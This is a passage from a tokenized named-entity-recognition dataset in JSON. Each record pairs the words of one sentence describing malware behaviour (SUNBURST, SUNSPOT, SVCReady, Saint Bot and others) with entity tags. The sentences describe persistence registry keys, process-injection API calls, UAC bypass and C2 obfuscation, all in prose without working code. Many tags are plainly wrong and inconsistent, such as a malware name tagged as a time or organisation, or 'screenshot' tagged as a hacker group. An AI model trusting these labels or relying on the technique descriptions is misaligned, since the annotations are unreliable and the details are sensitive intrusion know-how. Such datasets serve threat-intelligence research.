"SolarWinds", "API", "communications." ], "ner_tags": [ "B-Way", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "B-Tool", "O" ] }, { "tokens": [ "SUNBURST", "collected", "information", "from", "a", "compromised", "host." ], "ner_tags": [ "B-Way", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "SUNBURST", "attempted", "to", "disable", "software", "security", "services", "following", "checks", "against", "a", "FNV-1a", "+", "XOR", "hashed", "hardcoded", "blocklist." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SUNBURST", "dynamically", "resolved", "C2", "infrastructure", "for", "randomly-generated", "subdomains", "within", "a", "parent", "domain." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SUNBURST", "had", "a", "command", "to", "delete", "files." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "B-Features", "O" ] }, { "tokens": [ "SUNBURST", "had", "commands", "to", "enumerate", "files", "and", "directories." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "B-Features", "O", "O" ] }, { "tokens": [ "SUNBURST", "created", "an", "Image", "File", "Execution", "Options", "(IFEO)", "Debugger", "registry", "value", "for", "the", "process", "<code>dllhost.exe</code>", "to", "trigger", "the", "installation", "of", "Cobalt", "Strike." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "SUNBURST", "removed", "HTTP", "proxy", "registry", "values", "to", "clean", "up", "traces", "of", "execution." ], "ner_tags": [ "B-Way", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SUNBURST", "source", "code", "used", "generic", "variable", "names", "and", "pre-obfuscated", "strings,", "and", "was", "likely", "sanitized", "of", "developer", "comments", "before", "being", "added", "to", "SUNSPOT." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "SUNBURST", "delivered", "different", "payloads,", "including", "TEARDROP", "in", "at", "least", "one", "instance." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SUNBURST", "added", "junk", "bytes", "to", "its", "C2", "over", "HTTP." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "SUNBURST", "created", "VBScripts", "that", "were", "named", "after", "existing", "services", "or", "folders", "to", "blend", "into", "legitimate", "activities." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SUNBURST", "had", "commands", "that", "allow", "an", "attacker", "to", "write", "or", "delete", "registry", "keys,", "and", "was", "observed", "stopping", "services", "by", "setting", "their", "<code>HKLM\\SYSTEM\\CurrentControlSet\\services\\\\[service_name]\\\\Start</code>", "registry", "entries", "to", "value", "4.", "It", "also", "deleted", "previously-created", "Image", "File", "Execution", "Options", "(IFEO)", "Debugger", "registry", "values", "and", "registry", "keys", "related", "to", "HTTP", "proxy", "to", "clean", "up", "traces", "of", "its", "activity." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "B-HackOrg", "O", "B-Features", "O", "B-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "B-OffAct" ] }, { "tokens": [ "SUNBURST", "strings", "were", "compressed", "and", "encoded", "in", "Base64.", "SUNBURST", "also", "obfuscated", "collected", "system", "information", "using", "a", "FNV-1a", "+", "XOR", "algorithm." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Way", "B-Way", "O" ] }, { "tokens": [ "SUNBURST", "collected", "a", "list", "of", "process", "names", "that", "were", "hashed", "using", "a", "FNV-1a", "+", "XOR", "algorithm", "to", "check", "against", "similarly-hashed", "hardcoded", "blocklists." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Way", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SUNBURST", "masqueraded", "its", "network", "traffic", "as", "the", "Orion", "Improvement", "Program", "(OIP)", "protocol." ], "ner_tags": [ "B-Way", "B-Tool", "O", "I-Way", "I-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SUNBURST", "collected", "the", "registry", "value", "<code>HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\MachineGuid</code>", "from", "compromised", "hosts." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "SUNBURST", "used", "Rundll32", "to", "execute", "payloads." ], "ner_tags": [ "B-Way", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "SUNBURST", "checked", "for", "a", "variety", "of", "antivirus/endpoint", "detection", "agents", "prior", "to", "execution." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SUNBURST", "used", "Base64", "encoding", "in", "its", "C2", "traffic." ], "ner_tags": [ "B-Way", "O", "B-Way", "B-Tool", "O", "O", "O", "O" ] }, { "tokens": [ "SUNBURST", "C2", "data", "attempted", "to", "appear", "as", "benign", "XML", "related", "to", ".NET", "assemblies", "or", "as", "a", "faux", "JSON", "blob." ], "ner_tags": [ "B-Way", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "SUNBURST", "encrypted", "C2", "traffic", "using", "a", "single-byte-XOR", "cipher." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "SUNBURST", "checked", "the", "domain", "name", "of", "the", "compromised", "host", "to", "verify", "it", "was", "running", "in", "a", "real", "environment." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SUNBURST", "collected", "hostname", "and", "OS", "version." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SUNBURST", "collected", "all", "network", "interface", "MAC", "addresses", "that", "are", "up", "and", "not", "loopback", "devices,", "as", "well", "as", "IP", "address,", "DHCP", "configuration,", "and", "domain", "information." ], "ner_tags": [ "B-Way", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SUNBURST", "collected", "the", "username", "from", "a", "compromised", "host." ], "ner_tags": [ "B-Way", "I-Features", "I-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SUNBURST", "collected", "a", "list", "of", "service", "names", "that", "were", "hashed", "using", "a", "FNV-1a", "+", "XOR", "algorithm", "to", "check", "against", "similarly-hashed", "hardcoded", "blocklists." ], "ner_tags": [ "B-Way", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Way", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SUNBURST", "collected", "device", "`UPTIME`." ], "ner_tags": [ "B-Way", "O", "O", "B-Way" ] }, { "tokens": [ "SUNBURST", "remained", "dormant", "after", "initial", "access", "for", "a", "period", "of", "up", "to", "two", "weeks." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SUNBURST", "used", "VBScripts", "to", "initiate", "the", "execution", "of", "payloads." ], "ner_tags": [ "B-Way", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SUNBURST", "communicated", "via", "HTTP", "GET", "or", "HTTP", "POST", "requests", "to", "third", "party", "servers", "for", "C2." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SUNBURST", "used", "the", "WMI", "query", "<code>Select", "*", "From", "Win32_SystemDriver</code>", "to", "retrieve", "a", "driver", "listing." ], "ner_tags": [ "B-Way", "O", "O", "B-Way", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SUNSPOT", "modified", "its", "security", "token", "to", "grants", "itself", "debugging", "privileges", "by", "adding", "<code>SeDebugPrivilege</code>." ], "ner_tags": [ "B-Org", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SUNSPOT", "malware", "was", "designed", "and", "used", "to", "insert", "SUNBURST", "into", "software", "builds", "of", "the", "SolarWinds", "Orion", "IT", "management", "product." ], "ner_tags": [ "B-Way", "B-Tool", "O", "O", "O", "O", "O", "I-Features", "B-HackOrg", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O" ] }, { "tokens": [ "SUNSPOT", "decrypts", "SUNBURST,", "which", "was", "stored", "in", "AES128-CBC", "encrypted", "blobs." ], "ner_tags": [ "B-Way", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SUNSPOT", "only", "replaces", "SolarWinds", "Orion", "source", "code", "if", "the", "MD5", "checksums", "of", "both", "the", "original", "source", "code", "file", "and", "backdoored", "replacement", "source", "code", "match", "hardcoded", "values." ], "ner_tags": [ "B-Way", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Following", "the", "successful", "injection", "of", "SUNBURST,", "SUNSPOT", "deleted", "a", "temporary", "file", "it", "created", "named", "<code>InventoryManager.bk</code>", "after", "restoring", "the", "original", "SolarWinds", "Orion", "source", "code", "to", "the", "software", "library." ], "ner_tags": [ "O", "O", "O", "O", "O", "B-Way", "B-Org", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SUNSPOT", "enumerated", "the", "Orion", "software", "Visual", "Studio", "solution", "directory", "path." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SUNSPOT", "was", "identified", "on", "disk", "with", "a", "filename", "of", "<code>taskhostsvc.exe</code>", "and", "it", "created", "an", "encrypted", "log", "file", "at", "<code>C:\\Windows\\Temp\\vmware-vmdmp.log</code>." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SUNSPOT", "used", "Windows", "API", "functions", "such", "as", "<code>MoveFileEx</code>", "and", "<code>NtQueryInformationProcess</code>", "as", "part", "of", "the", "SUNBURST", "injection", "process." ], "ner_tags": [ "B-Org", "O", "O", "O", "O", "O", "O", "B-Way", "O", "B-SamFile", "O", "O", "O", "O", "B-Way", "O", "O" ] }, { "tokens": [ "SUNSPOT", "encrypted", "log", "entries", "it", "collected", "with", "the", "stream", "cipher", "RC4", "using", "a", "hard-coded", "key.", "It", "also", "uses", "AES128-CBC", "encrypted", "blobs", "for", "SUNBURST", "source", "code", "and", "data", "extracted", "from", "the", "SolarWinds", "Orion", "<MsBuild.exe</code>", "process." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "I-SamFile", "B-SamFile", "O" ] }, { "tokens": [ "SUNSPOT", "monitored", "running", "processes", "for", "instances", "of", "<code>MsBuild.exe</code>", "by", "hashing", "the", "name", "of", "each", "running", "process", "and", "comparing", "it", "to", "the", "corresponding", "value", "<code>0x53D525</code>.", "It", "also", "extracted", "command-line", "arguments", "and", "individual", "arguments", "from", "the", "running", "<code>MsBuild.exe</code>", "process", "to", "identify", "the", "directory", "path", "of", "the", "Orion", "software", "Visual", "Studio", "solution." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SUNSPOT", "created", "a", "copy", "of", "the", "SolarWinds", "Orion", "software", "source", "file", "with", "a", "<code>.bk</code>", "extension", "to", "backup", "the", "original", "content,", "wrote", "SUNBURST", "using", "the", "same", "filename", "but", "with", "a", "<code>.tmp</code>", "extension,", "and", "then", "moved", "SUNBURST", "using", "<code>MoveFileEx</code>", "to", "the", "original", "filename", "with", "a", "<code>.cs</code>", "extension", "so", "it", "could", "be", "compiled", "within", "Orion", "software." ], "ner_tags": [ "B-Org", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SUPERNOVA", "contained", "Base64-encoded", "strings." ], "ner_tags": [ "B-Way", "O", "O", "O" ] }, { "tokens": [ "SUPERNOVA", "was", "installed", "via", "exploitation", "of", "a", "SolarWinds", "Orion", "API", "authentication", "bypass", "vulnerability", "(CVE-2020-10148)." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Features" ] }, { "tokens": [ "SUPERNOVA", "has", "masqueraded", "as", "a", "legitimate", "SolarWinds", "DLL." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "SUPERNOVA", "had", "to", "receive", "an", "HTTP", "GET", "request", "containing", "a", "specific", "set", "of", "parameters", "in", "order", "to", "execute." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SUPERNOVA", "is", "a", "Web", "shell." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O" ] }, { "tokens": [ "SVCReady", "has", "created", "the", "`HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\{E6D34FFC-AD32-4d6a-934C-D387FA873A19}`", "Registry", "key", "for", "persistence." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-SamFile", "O", "O", "O", "O" ] }, { "tokens": [ "SVCReady", "can", "collect", "data", "from", "an", "infected", "host." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "SVCReady", "can", "send", "collected", "data", "in", "JSON", "format", "to", "its", "C2", "server." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SVCReady", "has", "the", "ability", "to", "download", "additional", "tools", "such", "as", "the", "RedLine", "Stealer", "to", "an", "infected", "host." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "B-Way", "B-SecTeam", "O", "O", "O", "O" ] }, { "tokens": [ "SVCReady", "has", "relied", "on", "users", "clicking", "a", "malicious", "attachment", "delivered", "through", "spearphishing." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "SVCReady", "has", "named", "a", "task", "`RecoveryExTask`", "as", "part", "of", "its", "persistence", "activity." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SVCReady", "can", "use", "Windows", "API", "calls", "to", "gather", "information", "from", "an", "infected", "host." ], "ner_tags": [ "B-SamFile", "O", "O", "I-Tool", "I-Tool", "O", "O", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "SVCReady", "can", "encrypt", "victim", "data", "with", "an", "RC4", "cipher." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "SVCReady", "can", "check", "for", "the", "number", "of", "devices", "plugged", "into", "an", "infected", "host." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SVCReady", "can", "collect", "a", "list", "of", "running", "processes", "from", "an", "infected", "host." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SVCReady", "can", "search", "for", "the", "`HKEY_LOCAL_MACHINE\\HARDWARE\\DESCRIPTION\\System`", "Registry", "key", "to", "gather", "system", "information." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SVCReady", "has", "used", "`rundll32.exe`", "for", "execution." ], "ner_tags": [ "B-SamFile", "O", "O", "B-SamFile", "O", "O" ] }, { "tokens": [ "SVCReady", "can", "create", "a", "scheduled", "task", "named", "`RecoveryExTask`", "to", "gain", "persistence." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SVCReady", "can", "take", "a", "screenshot", "from", "an", "infected", "host." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "B-HackOrg", "O", "O", "O", "O" ] }, { "tokens": [ "SVCReady", "can", "collect", "a", "list", "of", "installed", "software", "from", "an", "infected", "host." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SVCReady", "has", "been", "distributed", "via", "spearphishing", "campaigns", "containing", "malicious", "Mircrosoft", "Word", "documents." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Org", "B-OffAct", "O", "O", "B-Way", "I-SamFile", "O" ] }, { "tokens": [ "SVCReady", "has", "the", "ability", "to", "determine", "if", "its", "runtime", "environment", "is", "virtualized." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SVCReady", "has", "the", "ability", "to", "collect", "information", "such", "as", "computer", "name,", "computer", "manufacturer,", "BIOS,", "operating", "system,", "and", "firmware,", "including", "through", "the", "use", "of", "`systeminfo.exe`." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "SVCReady", "can", "collect", "the", "username", "from", "an", "infected", "host." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SVCReady", "can", "collect", "time", "zone", "information." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "I-Features", "O" ] }, { "tokens": [ "SVCReady", "can", "enter", "a", "sleep", "stage", "for", "30", "minutes", "to", "evade", "detection." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SVCReady", "has", "used", "VBA", "macros", "to", "execute", "shellcode." ], "ner_tags": [ "B-SamFile", "O", "O", "B-Way", "B-Tool", "O", "O", "O" ] }, { "tokens": [ "SVCReady", "can", "communicate", "with", "its", "C2", "servers", "via", "HTTP." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "SVCReady", "can", "use", "`WMI`", "queries", "to", "detect", "the", "presence", "of", "a", "virtual", "machine", "environment." ], "ner_tags": [ "B-SamFile", "O", "O", "B-Way", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SYNful", "Knock", "has", "the", "capability", "to", "add", "its", "own", "custom", "backdoor", "password", "when", "it", "modifies", "the", "operating", "system", "of", "the", "affected", "network", "device." ], "ner_tags": [ "B-Way", "B-SecTeam", "O", "O", "O", "O", "B-Features", "O", "B-Features", "I-Features", "B-HackOrg", "B-Features", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SYNful", "Knock", "is", "malware", "that", "is", "inserted", "into", "a", "network", "device", "by", "patching", "the", "operating", "system", "image." ], "ner_tags": [ "B-Way", "B-Tool", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O" ] }, { "tokens": [ "SYNful", "Knock", "can", "be", "sent", "instructions", "via", "special", "packets", "to", "change", "its", "functionality.", "Code", "for", "new", "functionality", "can", "be", "included", "in", "these", "messages." ], "ner_tags": [ "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SYSCON", "has", "the", "ability", "to", "use", "FTP", "in", "C2", "communications." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "SYSCON", "has", "been", "executed", "by", "luring", "victims", "to", "open", "malicious", "e-mail", "attachments." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "SYSCON", "has", "the", "ability", "to", "use", "Tasklist", "to", "list", "running", "processes." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "SYSCON", "has", "the", "ability", "to", "use", "Systeminfo", "to", "identify", "system", "information." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "B-Way", "O", "I-Features", "I-Features", "O" ] }, { "tokens": [ "SYSCON", "has", "the", "ability", "to", "execute", "commands", "through", "cmd", "on", "a", "compromised", "host." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "B-Features", "O", "B-SamFile", "O", "O", "O", "O" ] }, { "tokens": [ "Saint", "Bot", "has", "written", "its", "payload", "into", "a", "newly-created", "`EhStorAuthn.exe`", "process", "using", "`ZwWriteVirtualMemory`", "and", "executed", "it", "using", "`NtQueueApcThread`", "and", "`ZwAlertResumeThread`." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Saint", "Bot", "has", "attempted", "to", "bypass", "UAC", "using", "`fodhelper.exe`", "to", "escalate", "privileges." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "Saint", "Bot", "can", "collect", "files", "and", "information", "from", "a", "compromised", "host." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Saint", "Bot", "has", "used", "`is_debugger_present`", "as", "part", "of", "its", "environmental", "checks." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Saint", "Bot", "can", "deobfuscate", "strings", "and", "files", "for", "execution." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Saint", "Bot", "has", "injected", "its", "DLL", "component", "into", "`EhStorAurhn.exe`." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "Saint", "Bot", "can", "run", "a", "batch", "script", "named", "`del.bat`", "to", "remove", "any", "Saint", "Bot", "payload-linked", "files", "from", "a", "compromise", "system", "if", "anti-analysis", "or", "locale", "checks", "fail." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Saint", "Bot", "can", "search", "a", "compromised", "host", "for", "specific", "files." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "B-OffAct", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Saint", "Bot", "can", "download", "additional", "files", "onto", "a", "compromised", "host." ], "ner_tags": [ "B-SamFile", "B-SecTeam", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "Saint", "Bot", "had", "used", "`InstallUtil.exe`", "to", "download", "and", "deploy", "executables." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "B-Way", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Saint", "Bot", "has", "relied", "upon", "users", "to", "execute", "a", "malicious", "attachment", "delivered", "via", "spearphishing." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Saint", "Bot", "has", "relied", "on", "users", "to", "click", "on", "a", "malicious", "link", "delivered", "via", "a", "spearphishing." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Saint", "Bot", "has", "renamed", "malicious", "binaries", "as", "`wallpaper.mp4`", "and", "`slideshow.mp4`", "to", "avoid", "detection." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "B-SamFile", "O", "B-SamFile", "O", "O", "O" ] }, { "tokens": [ "Saint", "Bot", "has", "been", "disguised", "as", "a", "legitimate", "executable,", "including", "as", "Windows", "SDK." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Saint", "Bot", "has", "used", "different", "API", "calls,", "including", "`GetProcAddress`,", "`VirtualAllocEx`,", "`WriteProcessMemory`,", "`CreateProcessA`,", "and", "`SetThreadContext`." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "B-SamFile", "B-SamFile", "B-SamFile", "B-SamFile", "O", "B-SamFile" ] }, { "tokens": [ "Saint", "Bot", "has", "been", "obfuscated", "to", "help", "avoid", "detection." ], "ner_tags": [ "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Saint", "Bot", "has", "used", "PowerShell", "for", "execution." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "B-Way", "O", "O" ] }, { "tokens": [ "Saint", "Bot", "has", "enumerated", "running", "processes", "on", "a", "compromised", "host", "to", "determine", "if", "it", "is", "running", "under", "the", "process", "name", "`dfrgui.exe`." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "The", "Saint", "Bot", "loader", "has", "used", "API", "calls", "to", "spawn", "`MSBuild.exe`", "in", "a", "suspended", "state", "before", "injecting", "the", "decrypted", "Saint", "Bot", "binary", "into", "it." ], "ner_tags": [ "O", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "I-Tool", "O", "B-Tool", "O", "O" ] }, { "tokens": [ "Saint", "Bot", "has", "used", "`check_registry_keys`", "as", "part", "of", "its", "environmental", "checks." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Saint", "Bot", "has", "established", "persistence", "by", "being", "copied", "to", "the", "Startup", "directory", "or", "through", "the", "`\\Software\\Microsoft\\Windows\\CurrentVersion\\Run`", "registry", "key." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Saint", "Bot", "has", "used", "`regsvr32`", "to", "execute", "scripts." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Saint", "Bot", "has", "created", "a", "scheduled", "task", "named", "\"Maintenance\"", "to", "establish", "persistence." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Saint", "Bot", "has", "been", "packed", "using", "a", "dark", "market", "crypter." ], "ner_tags": [ "O", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Saint", "Bot", "has", "been", "distributed", "as", "malicious", "attachments", "within", "spearphishing", "emails." ], "ner_tags": [ "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "Saint", "Bot", "has", "been", "distributed", "through", "malicious", "links", "contained", "within", "spearphishing", "emails." ], "ner_tags": [ "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "Saint", "Bot", 